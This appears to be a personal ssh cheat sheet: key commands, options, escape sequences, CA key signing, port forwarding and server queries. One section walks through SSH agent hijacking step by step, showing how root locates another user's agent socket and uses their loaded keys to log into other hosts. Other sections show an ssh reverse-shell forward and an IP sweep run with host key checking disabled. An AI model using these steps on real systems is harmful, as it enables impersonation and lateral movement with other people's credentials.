ssh
Table of content
- Commands
- SSH Options
- Unresponsive Session
- Run command in background via ssh and no open ssh session
- SSH pubkey signing
- Portforwarding
- SSH Agent Hijacking
- Find out which ips are used in a ip range (e.g. vlan) for undocumented vips
- Query OpenSSH server
Commands
| Command | Description |
|---|---|
ssh-add -l | lists all keys assinged loaded in the agent |
ssh-keygen -f ~/.ssh/known_hosts -R [IP] | removes known_hosts entry for ip |
ssh-keygen -l -f [sshpubkey] | validates public ssh key |
ssh-keygen -l -E [checksumtype] -f [sshpubkey] | calculates fingerprint for checksum type (e.g. sha512 or md5) |
ssh-keygen -y -f [sshprivatkeyfile] | output public key matching private key from file |
ssh -Q [query_option] [destination] | wil query informations from openssh server |
| `ssh [targetuser]@[targethost] -J [jumpuser]@[jumphost] | ssh will first connect to the jumphost + creating a portforward (22) and connects then over the forwarded port to the destiatnio server |
SSH Options
| Option | Description | Sample |
|---|---|---|
| UserKnownHostsFile | Defines the path of the known_hosts file | -o “UserKnownHostsFile /dev/null” |
| StrictHostKeyChecking | Enables/Disables strick hostkey checking | -o “StrictHostKeyChecking no” |
| ConnectTimeout | time in seconds until it gives up connecting | -o ConnectTimeout 1 |
| ConnectionAttempts | number of attempts when trying to connect | -o ConnectionAttempts 1 |
Unresponsive Session
Sometimes it happens that you stay connected to a server while you do something else or walk away. Then it can happen, the when you return to your terminal where you executed the ssh command, that it got stuck and does not respond any more. Of course you could now close just the terminal and forget about it, but what if you have done other things in that one too and want to keep working in that one.
Well there is a easy way to do so, you just have to press the following keys one after the other and it will kill the session and return you to your old shell session of your terminal.
Enter~Tilda.Dot
After doing so you will see something like this:
myremoteuser@remotehost1:~$
myremoteuser@remotehost1:~$ Connection to remotehost1 closed
mylocaluser@localhost:~$
Returncode will be 255 for this action
Run command in background via ssh and no open ssh session
Via tmux
Make sure that you dont have remain-on-exit is not set in the tmux config This would keep the tmux session open till the user manually terminates it
$ ssh mydestinationhost "tmux myfancytmuxepidamicname -d \"sleep 10\""
Via screen
Make sure that you dont have zombie cr is not set in the screen config This would keep the screen session open till the user manually terminates it
$ ssh mydestinationhost screen -d -m "sleep 10"
SSH PUBKEY SIGNING
Generate CA for signing pubkeys It will ask your for a pwd, please use a good one ;)
$ ssh-keygen -f <caname>_ca
Now you will find two files in the directory: <caname>_ca and <caname>_ca.pub To sign now the pubkeys from the other hosts you should have them local available.
$ ssh-keygen -s <caname>_ca. -I <key_identifier> -h -n <host_name> host_pub_key_file #
Optional you can add a expire with -V
Sample:
$ sudo ssh-keygen -s /home/suchademon/VersionControl/ssh-sign/we-are-the-sons-of-sparda_ca -I host_sparda -h -n sparda /etc/ssh/ssh_host_ed25519_key.pub
[sudo] password for suchademon:
Enter passphrase:
Signed host key /etc/ssh/ssh_host_ed25519_key-cert.pub: id "host_sparda" serial 0 for sparda valid forever
Deploy new signed pub key to host and restart ssh daemon
Portforwarding
Forward multi ports from source host to destination in one ssh connect
$ ssh -R <SRCPORT>:<DESTIP>:<DESTPORT> -R <SRCPORT>:<DESTIP>:<DESTPORT>... -l root <SSHDESTINATION>
Sample:
$ ssh -R 9999:10.0.7.4:9999 -R8081:192.168.0.2:8081 -R8140:192.168.0.2:8140 -R389:10.0.9.5:389 -l root
$ ssh -R 27:192.168.0.1:22 -l root 192.168.1.2
Reverseshell
Such a port forward can also be used to establish a reverse shell connection like so:
$ ssh -R <RemotePort>:127.0.0.1:<YourLocalSshServerPort> <Remotehost/RemoteIP>
On local host (portforward (2002 to 22) from remote host to local host):
$ ssh -R 2002:127.0.0.1:22 192.168.1.2
on remote host (accessing the forwareded port):
$ ssh 127.0.0.1 -p 2002
SSH Agent Hijacking
First check if an addtional use is loged-in and check the user name
$ w
14:08:38 up 29 days, 4:19, 2 users, load average: 4.03, 1.60, 1.23
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
SOMEONEELSE pts/1 10.10.10.100 14:00 7.00s 0.03s 0.03s -bash
ISTME pts/2 10.10.10.101 14:08 0.00s 0.04s 0.00s w
Become root
$ su -
Get process of the ssh session
$ pstree -p SOMEONEELSE
sshd(110863)───bash(110864)
Shortest way is to check the tmp dir, and search for agent.
$ find /tmp/ -name "agent.110863" | grep ssh
/tmp/ssh-TE6SgmexKR/agent.110863
Now you can just easily check the ssh agent
$ SSH_AUTH_SOCK=/tmp/ssh-TE6SgmexKR/agent.110863 ssh-add -l
256 ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab SOMEONEELSE@SOMETHING (ED25519)
16384 ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab:ab .ssh/id_rsa (RSA)
So you know that there are keys loaded and can use them ;)
$ SSH_AUTH_SOCK=/tmp/ssh-TE6SgmexKR/agent.110863 ssh SOMEONEELSE@HOST2
Find out which ips are used in a ip range (e.g. vlan) for undocumented vips
a="10.70.44."; for i in {150..152}; do echo "${a}${i}: $(ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=1 -o ConnectionAttempts=1 -q ${a}${i} hostname 2>/dev/null)"; done
Query OpenSSH server
You can fetch informations like ciphers, mak and so on from running OpenSSH serivce by using ssh -Q
This will return you the list of resultes.
For example quering security configuration from a server:
$ for f in cipher mac kex key ; do echo "$f:" ; ssh -Q $f 10.42.42.1 ; echo ; echo ; echo ; done